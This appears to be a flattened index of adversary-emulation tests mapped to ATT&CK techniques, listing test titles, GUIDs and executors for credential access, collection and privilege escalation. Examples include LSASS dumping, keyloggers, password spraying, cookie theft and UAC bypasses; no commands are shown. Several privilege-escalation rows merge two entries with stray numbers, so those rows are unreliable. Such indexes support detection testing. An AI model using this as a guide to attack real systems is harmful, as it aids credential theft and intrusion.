credential-access T1558.003 Kerberoasting 5 Request All Tickets via PowerShell 902f4ed2-1aba-4133-90f2-cff6d299d6da powershell
credential-access T1555.001 Keychain 1 Keychain 1864fdec-ff86-4452-8c30-f12507582a93 sh
credential-access T1056.001 Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
credential-access T1056.001 Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
credential-access T1056.001 Keylogging 3 Logging bash history to syslog 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 sh
credential-access T1056.001 Keylogging 4 Bash session based keylogger 7f85a946-a0ea-48aa-b6ac-8ff539278258 sh
credential-access T1056.001 Keylogging 5 SSHD PAM keylogger 81d7d2ad-d644-4b6a-bea7-28ffe43becca sh
credential-access T1056.001 Keylogging 6 Auditd keylogger a668edb9-334e-48eb-8c2e-5413a40867af sh
credential-access T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay 1 LLMNR Poisoning with Inveigh (PowerShell) deecd55f-afe0-4a62-9fba-4d1ba2deb321 powershell
credential-access T1003.004 LSA Secrets 1 Dumping LSA Secrets 55295ab0-a703-433b-9ca4-ae13807de12f command_prompt
credential-access T1003.001 LSASS Memory 1 Dump LSASS.exe Memory using ProcDump 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8 command_prompt
credential-access T1003.001 LSASS Memory 2 Dump LSASS.exe Memory using comsvcs.dll 2536dee2-12fb-459a-8c37-971844fa73be powershell
credential-access T1003.001 LSASS Memory 3 Dump LSASS.exe Memory using direct system calls and API unhooking 7ae7102c-a099-45c8-b985-4c7a2d05790d command_prompt
credential-access T1003.001 LSASS Memory 4 Dump LSASS.exe Memory using NanoDump dddd4aca-bbed-46f0-984d-e4c5971c51ea command_prompt
credential-access T1003.001 LSASS Memory 5 Dump LSASS.exe Memory using Windows Task Manager dea6c349-f1c6-44f3-87a1-1ed33a59a607 manual
credential-access T1003.001 LSASS Memory 6 Offline Credential Theft With Mimikatz 453acf13-1dbd-47d7-b28a-172ce9228023 command_prompt
credential-access T1003.001 LSASS Memory 7 LSASS read with pypykatz c37bc535-5c62-4195-9cc3-0517673171d8 command_prompt
credential-access T1003.001 LSASS Memory 8 Dump LSASS.exe Memory using Out-Minidump.ps1 6502c8f0-b775-4dbd-9193-1298f56b6781 powershell
credential-access T1003.001 LSASS Memory 9 Create Mini Dump of LSASS.exe using ProcDump 7cede33f-0acd-44ef-9774-15511300b24b command_prompt
credential-access T1003.001 LSASS Memory 10 Powershell Mimikatz 66fb0bc1-3c3f-47e9-a298-550ecfefacbc powershell
credential-access T1003.001 LSASS Memory 11 Dump LSASS with .Net 5 createdump.exe 9d0072c8-7cca-45c4-bd14-f852cfa35cf0 powershell
credential-access T1003.001 LSASS Memory 12 Dump LSASS.exe using imported Microsoft DLLs 86fc3f40-237f-4701-b155-81c01c48d697 powershell
credential-access T1003.003 NTDS 1 Create Volume Shadow Copy with vssadmin dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f command_prompt
credential-access T1003.003 NTDS 2 Copy NTDS.dit from Volume Shadow Copy c6237146-9ea6-4711-85c9-c56d263a6b03 command_prompt
credential-access T1003.003 NTDS 3 Dump Active Directory Database with NTDSUtil 2364e33d-ceab-4641-8468-bfb1d7cc2723 command_prompt
credential-access T1003.003 NTDS 4 Create Volume Shadow Copy with WMI 224f7de0-8f0a-4a94-b5d8-989b036c86da command_prompt
credential-access T1003.003 NTDS 5 Create Volume Shadow Copy remotely with WMI d893459f-71f0-484d-9808-ec83b2b64226 command_prompt
credential-access T1003.003 NTDS 6 Create Volume Shadow Copy remotely (WMI) with esentutl 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865 command_prompt
credential-access T1003.003 NTDS 7 Create Volume Shadow Copy with Powershell 542bb97e-da53-436b-8e43-e0a7d31a6c24 powershell
credential-access T1003.003 NTDS 8 Create Symlink to Volume Shadow Copy 21748c28-2793-4284-9e07-d6d028b66702 command_prompt
credential-access T1040 Network Sniffing 1 Packet Capture Linux 7fe741f7-b265-4951-a7c7-320889083b3e bash
credential-access T1040 Network Sniffing 2 Packet Capture macOS 9d04efee-eff5-4240-b8d2-07792b873608 bash
credential-access T1040 Network Sniffing 3 Packet Capture Windows Command Prompt a5b2f6a0-24b4-493e-9590-c699f75723ca command_prompt
credential-access T1040 Network Sniffing 4 Windows Internal Packet Capture b5656f67-d67f-4de8-8e62-b5581630f528 command_prompt
credential-access T1003 OS Credential Dumping 1 Gsecdump 96345bfc-8ae7-4b6a-80b7-223200f24ef9 command_prompt
credential-access T1003 OS Credential Dumping 2 Credential Dumping with NPPSpy 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 powershell
credential-access T1003 OS Credential Dumping 3 Dump svchost.exe to gather RDP credentials d400090a-d8ca-4be0-982e-c70598a23de9 powershell
credential-access T1110.002 Password Cracking 1 Password Cracking with Hashcat 6d27df5d-69d4-4c91-bc33-5983ffe91692 command_prompt
credential-access T1556.002 Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
credential-access T1110.001 Password Guessing 1 Brute Force Credentials of single Active Directory domain users via SMB 09480053-2f98-4854-be6e-71ae5f672224 command_prompt
credential-access T1110.001 Password Guessing 2 Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) c2969434-672b-4ec8-8df0-bbb91f40e250 powershell
credential-access T1110.001 Password Guessing 3 Brute Force Credentials of single Azure AD user 5a51ef57-299e-4d62-8e11-2d440df55e69 powershell
credential-access T1110.001 Password Guessing 4 SUDO brute force Debian 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a sh
credential-access T1110.001 Password Guessing 5 SUDO brute force Redhat b72958a7-53e3-4809-9ee1-58f6ecd99ade sh
credential-access T1110.003 Password Spraying 1 Password Spray all Domain Users 90bc2e54-6c84-47a5-9439-0a2a92b4b175 command_prompt
credential-access T1110.003 Password Spraying 2 Password Spray (DomainPasswordSpray) 263ae743-515f-4786-ac7d-41ef3a0d4b2b powershell
credential-access T1110.003 Password Spraying 3 Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) f14d956a-5b6e-4a93-847f-0c415142f07d powershell
credential-access T1110.003 Password Spraying 4 Password spray all Azure AD users with a single password a8aa2d3e-1c52-4016-bc73-0f8854cfa80a powershell
credential-access T1556.003 Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
credential-access T1556.003 Pluggable Authentication Modules 2 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
credential-access T1552.004 Private Keys 1 Private Keys 520ce462-7ca7-441e-b5a5-f8347f632696 command_prompt
credential-access T1552.004 Private Keys 2 Discover Private SSH Keys 46959285-906d-40fa-9437-5a439accd878 sh
credential-access T1552.004 Private Keys 3 Copy Private SSH Keys with CP 7c247dc7-5128-4643-907b-73a76d9135c3 sh
credential-access T1552.004 Private Keys 4 Copy Private SSH Keys with rsync 864bb0b2-6bb5-489a-b43b-a77b3a16d68a sh
credential-access T1552.004 Private Keys 5 Copy the users GnuPG directory with rsync 2a5a0601-f5fb-4e2e-aa09-73282ae6afca sh
credential-access T1552.004 Private Keys 6 ADFS token signing and encryption certificates theft - Local 78e95057-d429-4e66-8f82-0f060c1ac96f powershell
credential-access T1552.004 Private Keys 7 ADFS token signing and encryption certificates theft - Remote cab413d8-9e4a-4b8d-9b84-c985bd73a442 powershell
credential-access T1003.007 Proc Filesystem 1 Dump individual process memory with sh (Local) 7e91138a-8e74-456d-a007-973d67a0bb80 sh
credential-access T1003.007 Proc Filesystem 2 Dump individual process memory with Python (Local) 437b2003-a20d-4ed8-834c-4964f24eec63 sh
credential-access T1003.007 Proc Filesystem 3 Capture Passwords with MimiPenguin a27418de-bdce-4ebd-b655-38f04842bf0c bash
credential-access T1606.002 SAML Tokens 1 Golden SAML b16a03bc-1089-4dcc-ad98-30fe8f3a2b31 powershell
credential-access T1003.002 Security Account Manager 1 Registry dump of SAM, creds, and secrets 5c2571d0-1572-416d-9676-812e64ca9f44 command_prompt
credential-access T1003.002 Security Account Manager 2 Registry parse with pypykatz a96872b2-cbf3-46cf-8eb4-27e8c0e85263 command_prompt
credential-access T1003.002 Security Account Manager 3 esentutl.exe SAM copy a90c2f4d-6726-444e-99d2-a00cd7c20480 command_prompt
credential-access T1003.002 Security Account Manager 4 PowerDump Hashes and Usernames from Registry 804f28fc-68fc-40da-b5a2-e9d0bce5c193 powershell
credential-access T1003.002 Security Account Manager 5 dump volume shadow copy hives with certutil eeb9751a-d598-42d3-b11c-c122d9c3f6c7 powershell
credential-access T1003.002 Security Account Manager 6 dump volume shadow copy hives with System.IO.File 9d77fed7-05f8-476e-a81b-8ff0472c64d0 powershell
credential-access T1558.002 Silver Ticket 1 Crafting Active Directory silver tickets with mimikatz 385e59aa-113e-4711-84d9-f637aef01f2c powershell
credential-access T1539 Steal Web Session Cookie 1 Steal Firefox Cookies (Windows) 4b437357-f4e9-4c84-9fa6-9bcee6f826aa powershell
credential-access T1539 Steal Web Session Cookie 2 Steal Chrome Cookies (Windows) 26a6b840-4943-4965-8df5-ef1f9a282440 powershell
credential-access T1555.004 Windows Credential Manager 1 Access Saved Credentials via VaultCmd 9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439 command_prompt
collection T1560 Archive Collected Data 1 Compress Data for Exfiltration With PowerShell 41410c60-614d-4b9d-b66e-b0192dd9c597 powershell
collection T1560.002 Archive via Library 1 Compressing data using GZip in Python (Linux) 391f5298-b12d-4636-8482-35d9c17d53a8 bash
collection T1560.002 Archive via Library 2 Compressing data using bz2 in Python (Linux) c75612b2-9de0-4d7c-879c-10d7b077072d bash
collection T1560.002 Archive via Library 3 Compressing data using zipfile in Python (Linux) 001a042b-859f-44d9-bf81-fd1c4e2200b0 bash
collection T1560.002 Archive via Library 4 Compressing data using tarfile in Python (Linux) e86f1b4b-fcc1-4a2a-ae10-b49da01458db bash
collection T1560.001 Archive via Utility 1 Compress Data for Exfiltration With Rar 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0 command_prompt
collection T1560.001 Archive via Utility 2 Compress Data and lock with password for Exfiltration with winrar 8dd61a55-44c6-43cc-af0c-8bdda276860c command_prompt
collection T1560.001 Archive via Utility 3 Compress Data and lock with password for Exfiltration with winzip 01df0353-d531-408d-a0c5-3161bf822134 command_prompt
collection T1560.001 Archive via Utility 4 Compress Data and lock with password for Exfiltration with 7zip d1334303-59cb-4a03-8313-b3e24d02c198 command_prompt
collection T1560.001 Archive via Utility 5 Data Compressed - nix - zip c51cec55-28dd-4ad2-9461-1eacbc82c3a0 sh
collection T1560.001 Archive via Utility 6 Data Compressed - nix - gzip Single File cde3c2af-3485-49eb-9c1f-0ed60e9cc0af sh
collection T1560.001 Archive via Utility 7 Data Compressed - nix - tar Folder or File 7af2b51e-ad1c-498c-aca8-d3290c19535a sh
collection T1560.001 Archive via Utility 8 Data Encrypted with zip and gpg symmetric 0286eb44-e7ce-41a0-b109-3da516e05a5f sh
collection T1123 Audio Capture 1 using device audio capture commandlet 9c3ad250-b185-4444-b5a9-d69218a10c95 powershell
collection T1123 Audio Capture 2 Registry artefact when application use microphone 7a21cce2-6ada-4f7c-afd9-e1e9c481e44a command_prompt
collection T1119 Automated Collection 1 Automated Collection Command Prompt cb379146-53f1-43e0-b884-7ce2c635ff5b command_prompt
collection T1119 Automated Collection 2 Automated Collection PowerShell 634bd9b9-dc83-4229-b19f-7f83ba9ad313 powershell
collection T1119 Automated Collection 3 Recon information for export with PowerShell c3f6d794-50dd-482f-b640-0384fbb7db26 powershell
collection T1119 Automated Collection 4 Recon information for export with Command Prompt aa1180e2-f329-4e1e-8625-2472ec0bfaf3 command_prompt
collection T1115 Clipboard Data 1 Utilize Clipboard to store or execute commands from 0cd14633-58d4-4422-9ede-daa2c9474ae7 command_prompt
collection T1115 Clipboard Data 2 Execute Commands from Clipboard using PowerShell d6dc21af-bec9-4152-be86-326b6babd416 powershell
collection T1115 Clipboard Data 3 Execute commands from clipboard 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff bash
collection T1115 Clipboard Data 4 Collect Clipboard Data via VBA 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52 powershell
collection T1056.004 Credential API Hooking 1 Hook PowerShell TLS Encrypt/Decrypt Messages de1934ea-1fbf-425b-8795-65fb27dd7e33 powershell
collection T1039 Data from Network Shared Drive 1 Copy a sensitive File over Administive share with copy 6ed67921-1774-44ba-bac6-adb51ed60660 command_prompt
collection T1039 Data from Network Shared Drive 2 Copy a sensitive File over Administive share with Powershell 7762e120-5879-44ff-97f8-008b401b9a98 powershell
collection T1056.002 GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
collection T1056.002 GUI Input Capture 2 PowerShell - Prompt User for Password 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 powershell
collection T1056.001 Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
collection T1056.001 Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
collection T1056.001 Keylogging 3 Logging bash history to syslog 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 sh
collection T1056.001 Keylogging 4 Bash session based keylogger 7f85a946-a0ea-48aa-b6ac-8ff539278258 sh
collection T1056.001 Keylogging 5 SSHD PAM keylogger 81d7d2ad-d644-4b6a-bea7-28ffe43becca sh
collection T1056.001 Keylogging 6 Auditd keylogger a668edb9-334e-48eb-8c2e-5413a40867af sh
collection T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay 1 LLMNR Poisoning with Inveigh (PowerShell) deecd55f-afe0-4a62-9fba-4d1ba2deb321 powershell
collection T1074.001 Local Data Staging 1 Stage data from Discovery.bat 107706a5-6f9f-451a-adae-bab8c667829f powershell
collection T1074.001 Local Data Staging 2 Stage data from Discovery.sh 39ce0303-ae16-4b9e-bb5b-4f53e8262066 bash
collection T1074.001 Local Data Staging 3 Zip a Folder with PowerShell for Staging in Temp a57fbe4b-3440-452a-88a7-943531ac872a powershell
collection T1114.001 Local Email Collection 1 Email Collection with PowerShell Get-Inbox 3f1b5096-0139-4736-9b78-19bcb02bb1cb powershell
collection T1113 Screen Capture 1 Screencapture 0f47ceb1-720f-4275-96b8-21f0562217ac bash
collection T1113 Screen Capture 2 Screencapture (silent) deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 bash
collection T1113 Screen Capture 3 X Windows Capture 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac bash
collection T1113 Screen Capture 4 Capture Linux Desktop using Import Tool 9cd1cccb-91e4-4550-9139-e20a586fcea1 bash
collection T1113 Screen Capture 5 Windows Screencapture 3c898f62-626c-47d5-aad2-6de873d69153 powershell
collection T1113 Screen Capture 6 Windows Screen Capture (CopyFromScreen) e9313014-985a-48ef-80d9-cde604ffc187 powershell
collection T1125 Video Capture 1 Registry artefact when application use webcam 6581e4a7-42e3-43c5-a0d2-5a0d62f9702a command_prompt
4 privilege-escalation T1546.008 Accessibility Features 1 Attaches Command Prompt as a Debugger to a List of Target Processes 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 powershell
privilege-escalation T1546.008 Accessibility Features 2 Replace binary of sticky keys 934e90cf-29ca-48b3-863c-411737ad44e3 command_prompt
5 privilege-escalation T1546.010 AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
6 privilege-escalation T1546.011 Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
7 privilege-escalation T1546.011 Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
9 privilege-escalation T1055.004 Asynchronous Procedure Call 1 Process Injection via C# 611b39b7-e243-4c81-87a4-7145a90358b1 command_prompt
10 privilege-escalation T1053.001 At (Linux) 1 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
11 privilege-escalation T1053.002 At (Windows) 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
12 privilege-escalation T1547.002 T1548.002 Authentication Package Bypass User Access Control 1 Authentication Package Bypass UAC using Event Viewer (cmd) be2590e8-4ac3-47ac-b4b5-945820f2fbe9 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 powershell command_prompt
13 privilege-escalation T1547 T1548.002 Boot or Logon Autostart Execution Bypass User Access Control 1 2 Add a driver Bypass UAC using Event Viewer (PowerShell) cb01b3da-b0e7-4e24-bf6d-de5223526785 a6ce9acf-842a-4af6-8f79-539be7608e2b command_prompt powershell
14 privilege-escalation T1548.002 Bypass User Account Control Bypass User Access Control 1 3 Bypass UAC using Event Viewer (cmd) Bypass UAC using Fodhelper 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 58f641ea-12e3-499a-b684-44dee46bd182 command_prompt
15 privilege-escalation T1548.002 Bypass User Account Control Bypass User Access Control 2 4 Bypass UAC using Event Viewer (PowerShell) Bypass UAC using Fodhelper - PowerShell a6ce9acf-842a-4af6-8f79-539be7608e2b 3f627297-6c38-4e7d-a278-fc2563eaaeaa powershell
16 privilege-escalation T1548.002 Bypass User Account Control Bypass User Access Control 3 5 Bypass UAC using Fodhelper Bypass UAC using ComputerDefaults (PowerShell) 58f641ea-12e3-499a-b684-44dee46bd182 3c51abf2-44bf-42d8-9111-dc96ff66750f command_prompt powershell
17 privilege-escalation T1548.002 Bypass User Account Control Bypass User Access Control 4 6 Bypass UAC using Fodhelper - PowerShell Bypass UAC by Mocking Trusted Directories 3f627297-6c38-4e7d-a278-fc2563eaaeaa f7a35090-6f7f-4f64-bb47-d657bf5b10c1 powershell command_prompt
18 privilege-escalation T1548.002 Bypass User Account Control Bypass User Access Control 5 7 Bypass UAC using ComputerDefaults (PowerShell) Bypass UAC using sdclt DelegateExecute 3c51abf2-44bf-42d8-9111-dc96ff66750f 3be891eb-4608-4173-87e8-78b494c029b7 powershell
privilege-escalation T1548.002 Bypass User Account Control 6 Bypass UAC by Mocking Trusted Directories f7a35090-6f7f-4f64-bb47-d657bf5b10c1 command_prompt
privilege-escalation T1548.002 Bypass User Account Control 7 Bypass UAC using sdclt DelegateExecute 3be891eb-4608-4173-87e8-78b494c029b7 powershell
privilege-escalation T1548.002 Bypass User Account Control 8 Disable UAC using reg.exe 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 command_prompt
privilege-escalation T1548.002 Bypass User Account Control 9 Bypass UAC using SilentCleanup task 28104f8a-4ff1-4582-bcf6-699dce156608 command_prompt
privilege-escalation T1548.002 Bypass User Account Control 10 UACME Bypass Method 23 8ceab7a2-563a-47d2-b5ba-0995211128d7 command_prompt
privilege-escalation T1548.002 Bypass User Account Control 11 UACME Bypass Method 31 b0f76240-9f33-4d34-90e8-3a7d501beb15 command_prompt
privilege-escalation T1548.002 Bypass User Account Control 12 UACME Bypass Method 33 e514bb03-f71c-4b22-9092-9f961ec6fb03 command_prompt
privilege-escalation T1548.002 Bypass User Account Control 13 UACME Bypass Method 34 695b2dac-423e-448e-b6ef-5b88e93011d6 command_prompt
privilege-escalation T1548.002 Bypass User Account Control 14 UACME Bypass Method 39 56163687-081f-47da-bb9c-7b231c5585cf command_prompt
privilege-escalation T1548.002 Bypass User Account Control 15 UACME Bypass Method 56 235ec031-cd2d-465d-a7ae-68bab281e80e command_prompt
privilege-escalation T1548.002 Bypass User Account Control 16 UACME Bypass Method 59 dfb1b667-4bb8-4a63-a85e-29936ea75f29 command_prompt
privilege-escalation T1548.002 Bypass User Account Control 17 UACME Bypass Method 61 7825b576-744c-4555-856d-caf3460dc236 command_prompt
19 privilege-escalation T1574.012 COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
20 privilege-escalation T1574.012 COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
21 privilege-escalation T1574.012 COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
22 privilege-escalation T1546.001 Change Default File Association 1 Change Default File Association 10a08978-2045-4d62-8c42-1957bbbea102 command_prompt
privilege-escalation T1078.004 Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e gcloud
privilege-escalation T1546.015 Component Object Model Hijacking 1 COM Hijacking - InprocServer32 48117158-d7be-441b-bc6a-d9e36e47b52b powershell
privilege-escalation T1546.015 Component Object Model Hijacking 2 Powershell Execute COM Object 752191b1-7c71-445c-9dbe-21bb031b18eb powershell
privilege-escalation T1053.007 Container Orchestration Job 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
privilege-escalation T1053.007 Container Orchestration Job 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
privilege-escalation T1134.002 Create Process with Token 1 Access Token Manipulation dbf4f5a9-b8e0-46a3-9841-9ad71247239e powershell
23 privilege-escalation T1053.003 Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
24 privilege-escalation T1053.003 Cron 2 Cron - Add script to all cron subfolders Cron - Add script to cron folder b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
privilege-escalation T1053.003 Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
25 privilege-escalation T1574.001 DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
26 privilege-escalation T1574.002 DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
27 privilege-escalation T1078.001 Default Accounts 1 Enable Guest account with RDP capability and admin privileges Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
privilege-escalation T1078.001 Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
privilege-escalation T1484.002 Domain Trust Modification 1 Add Federation to Azure AD 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 powershell
privilege-escalation T1574.006 Dynamic Linker Hijacking 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
privilege-escalation T1574.006 Dynamic Linker Hijacking 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
privilege-escalation T1055.001 Dynamic-link Library Injection 1 Process Injection via mavinject.exe 74496461-11a1-4982-b439-4d87a550d254 powershell
28 privilege-escalation T1546.014 Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
privilege-escalation T1611 Escape to Host 1 Deploy container using nsenter container escape 0b2f9520-a17a-4671-9dba-3bd034099fff sh
29 privilege-escalation T1546.012 Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
30 privilege-escalation T1546.012 Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
31 privilege-escalation T1547.006 Kernel Modules and Extensions 1 Linux - Load Kernel Module via insmod 687dcb93-9656-4853-9c36-9977315e9d23 bash
32 privilege-escalation T1574.006 LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
33 privilege-escalation T1574.006 LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
34 privilege-escalation T1543.001 Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
35 privilege-escalation T1543.004 Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
36 privilege-escalation T1053.004 Launchd 1 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
privilege-escalation T1078.003 Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
privilege-escalation T1078.003 Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
37 privilege-escalation T1037.002 Logon Script (Mac) 1 Logon Scripts - Mac f047c7de-a2d9-406e-a62b-12a09d9516f4 manual
38 privilege-escalation T1037.001 Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
39 privilege-escalation T1546.007 Netsh Helper DLL 1 Netsh Helper DLL Registration 3244697d-5a3a-4dfc-941c-550f69f91a4d command_prompt
47 privilege-escalation T1547.010 Port Monitors 1 Add Port Monitor persistence in Registry d34ef297-f178-4462-871e-9ce618d44e50 command_prompt
48 privilege-escalation T1546.013 PowerShell Profile 1 Append malicious start-process cmdlet 090e5aa5-32b6-473b-a49b-21e843a56896 powershell
49 privilege-escalation T1055.012 Process Hollowing 1 Process Hollowing using PowerShell 562427b4-39ef-4e8c-af88-463a78e70b9c powershell
50 privilege-escalation T1055.012 T1055 Process Hollowing Process Injection 2 1 RunPE via VBA Process Injection via mavinject.exe 3ad4a037-1598-4136-837c-4027e4fa319b 74496461-11a1-4982-b439-4d87a550d254 powershell
51 privilege-escalation T1055 T1037.004 Process Injection Rc.common 1 Shellcode execution via VBA rc.common 1c91e740-1729-4329-b779-feba6e71d048 97a48daa-8bca-4bc0-b1a9-c1d163e762de powershell bash
privilege-escalation T1055 Process Injection 2 Remote Process Injection in LSASS via mimikatz 3203ad24-168e-4bec-be36-f79b13ef8a83 command_prompt
privilege-escalation T1037.004 RC Scripts 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
privilege-escalation T1037.004 RC Scripts 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
privilege-escalation T1037.004 RC Scripts 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 bash
52 privilege-escalation T1547.007 Re-opened Applications 1 Re-Opened Applications 5fefd767-ef54-4ac6-84d3-751ab85e8aba manual
53 privilege-escalation T1547.007 Re-opened Applications 2 Re-Opened Applications 5f5b71da-e03f-42e7-ac98-d63f9e0465cb sh
54 privilege-escalation T1547.001 Registry Run Keys / Startup Folder 1 Reg Key Run e55be3fd-3521-4610-9d1a-e210e42dcf05 command_prompt
57 privilege-escalation T1547.001 Registry Run Keys / Startup Folder 4 Suspicious vbs file run from startup Folder 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 powershell
58 privilege-escalation T1547.001 Registry Run Keys / Startup Folder 5 Suspicious jse file run from startup Folder dade9447-791e-4c8f-b04b-3a35855dfa06 powershell
59 privilege-escalation T1547.001 Registry Run Keys / Startup Folder 6 Suspicious bat file run from startup Folder 5b6768e4-44d2-44f0-89da-a01d1430fd5e powershell
privilege-escalation T1547.001 Registry Run Keys / Startup Folder 7 Add Executable Shortcut Link to User Startup Folder 24e55612-85f6-4bd6-ae74-a73d02e3441d powershell
privilege-escalation T1547.001 Registry Run Keys / Startup Folder 8 Add persistance via Recycle bin bda6a3d6-7aa7-4e89-908b-306772e9662f command_prompt
privilege-escalation T1547.001 Registry Run Keys / Startup Folder 9 SystemBC Malware-as-a-Service Registry 9dc7767b-30c1-4cc4-b999-50cab5e27891 powershell
privilege-escalation T1134.005 SID-History Injection 1 Injection SID-History with mimikatz 6bef32e5-9456-4072-8f14-35566fb85401 command_prompt
60 privilege-escalation T1053.005 Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
61 privilege-escalation T1053.005 Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
62 privilege-escalation T1053.005 Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
63 privilege-escalation T1053.005 Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
privilege-escalation T1053.005 Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
privilege-escalation T1053.005 Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
privilege-escalation T1053.005 Scheduled Task 7 Scheduled Task Executing Base64 Encoded Commands From Registry e895677d-4f06-49ab-91b6-ae3742d0a2ba command_prompt
64 privilege-escalation T1546.002 Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
65 privilege-escalation T1547.005 Security Support Provider 1 Modify SSP configuration in registry afdfd7e3-8a0b-409f-85f7-886fdf249c9e powershell
66 privilege-escalation T1574.011 Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
privilege-escalation T1574.011 Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
67 privilege-escalation T1548.001 Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
68 privilege-escalation T1548.001 Setuid and Setgid 2 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
69 privilege-escalation T1548.001 Setuid and Setgid 3 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
